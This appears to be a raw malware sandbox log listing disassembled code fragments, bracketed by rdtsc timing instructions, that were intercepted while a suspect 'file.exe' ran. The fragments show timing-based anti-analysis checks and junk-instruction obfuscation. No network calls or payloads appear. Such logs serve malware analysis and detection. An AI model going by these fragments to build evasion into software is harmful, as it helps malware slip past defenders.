Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DC192 second address: 5DC19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DC19A second address: 5DC19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DC19F second address: 5DC1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DC1A5 second address: 5DC1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DBB8F second address: 5DBBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push esi 0x00000007 jbe 00007F40B515FC13h 0x0000000d jmp 00007F40B515FC07h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E18D4 second address: 5E18EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B477E790h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E18EA second address: 5E18FF instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B515FBFCh 0x00000008 jc 00007F40B515FBF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E18FF second address: 5E1908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1908 second address: 5E190E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E07F6 second address: 5E0808 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F40B477E786h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0808 second address: 5E080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0962 second address: 5E0989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E78Eh 0x00000009 jmp 00007F40B477E795h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590BF6 second address: 590BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590BFA second address: 590CA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F40B477E79Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 jmp 00007F40B477E78Fh 0x00000017 pop ebx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F40B477E788h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jmp 00007F40B477E793h 0x00000038 mov ebx, dword ptr [ebp+12484B88h] 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F40B477E788h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 add eax, ebx 0x0000005a or cx, B08Bh 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jne 00007F40B477E788h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590CA8 second address: 590CB2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B515FBFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590CB2 second address: 590D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F40B477E788h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jc 00007F40B477E792h 0x00000029 jp 00007F40B477E78Ch 0x0000002f mov edx, dword ptr [ebp+1244F401h] 0x00000035 movzx ecx, dx 0x00000038 push 00000004h 0x0000003a sub di, 82F1h 0x0000003f nop 0x00000040 jmp 00007F40B477E795h 0x00000045 push eax 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590D14 second address: 590D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590D18 second address: 590D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5845 second address: 5E584B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4A39 second address: 5E4A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F40B477E786h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4BA5 second address: 5E4BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 js 00007F40B515FBF6h 0x0000000d jno 00007F40B515FBF6h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4BB9 second address: 5E4BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4BC3 second address: 5E4BF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FC05h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4EBB second address: 5E4EC7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E786h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E530E second address: 5E532A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B515FBF6h 0x0000000a jmp 00007F40B515FC01h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E532A second address: 5E5330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5330 second address: 5E5336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5336 second address: 5E5368 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F40B477E798h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F40B477E78Ch 0x00000019 jnl 00007F40B477E786h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5368 second address: 5E5389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F40B515FC01h 0x0000000c popad 0x0000000d jo 00007F40B515FBFCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ECBFC second address: 5ECC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ECC0D second address: 5ECC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ECC15 second address: 5ECC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EAC5C second address: 5EAC60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EAC60 second address: 5EAC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B477E793h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EAC79 second address: 5EAC8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EAC8C second address: 5EACAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E792h 0x00000009 je 00007F40B477E786h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EACAC second address: 5EACD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F40B515FBF6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F40B515FBF6h 0x00000014 jmp 00007F40B515FC01h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB1D8 second address: 5EB1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB1DC second address: 5EB1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F40B515FBF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F40B515FBFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB4CC second address: 5EB4E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E797h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB4E9 second address: 5EB4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC59E second address: 5EC5BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E795h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC5BB second address: 5EC5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC5C1 second address: 5EC5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC872 second address: 5EC885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F40B515FBF6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F40B515FBF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC885 second address: 5EC88B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC88B second address: 5EC891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F342D second address: 5F343E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B477E786h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F71D2 second address: 5F71E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F40B515FBF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6598 second address: 5F659C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F659C second address: 5F65A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6715 second address: 5F6719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6719 second address: 5F6744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F40B515FC06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6B6A second address: 5F6B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6B6F second address: 5F6B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC03h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6EB3 second address: 5F6ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F40B477E791h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FCA63 second address: 5FCA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FCA6D second address: 5FCA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jl 00007F40B477E798h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F40B477E786h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FCA81 second address: 5FCA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FD021 second address: 5FD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FD025 second address: 5FD02B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FDFA3 second address: 5FDFC4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E790h 0x00000008 jmp 00007F40B477E78Ah 0x0000000d pushad 0x0000000e jnp 00007F40B477E786h 0x00000014 jnp 00007F40B477E786h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6146DD second address: 6146E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6146E7 second address: 6146EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6146EB second address: 6146F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6146F5 second address: 6146F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61824C second address: 618259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F40B515FBF6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622FD5 second address: 622FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622FD9 second address: 622FDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628433 second address: 62846E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a popad 0x0000000b jns 00007F40B477E788h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jmp 00007F40B477E799h 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ebx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jns 00007F40B477E78Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62846E second address: 628472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FA13 second address: 62FA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F40B477E786h 0x0000000e jne 00007F40B477E786h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FB6A second address: 62FB70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FB70 second address: 62FB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FB74 second address: 62FB82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FF66 second address: 62FF74 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F40B477E788h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62FF74 second address: 62FF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63012C second address: 630139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630139 second address: 63013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63013F second address: 63015F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F40B477E793h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63015F second address: 630164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630164 second address: 63016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63016C second address: 630170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630445 second address: 630449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6354B2 second address: 6354B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6354B8 second address: 6354C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6354C1 second address: 6354E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F40B515FC09h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6354E0 second address: 6354E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 644627 second address: 644639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642433 second address: 64243D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64243D second address: 642441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 650337 second address: 650343 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 650343 second address: 650347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6539A1 second address: 6539A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6539A7 second address: 6539AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6553A0 second address: 6553A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6553A5 second address: 6553BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F40B515FBF6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jl 00007F40B515FBF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E039 second address: 66E041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E041 second address: 66E045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E045 second address: 66E049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E882 second address: 66E888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
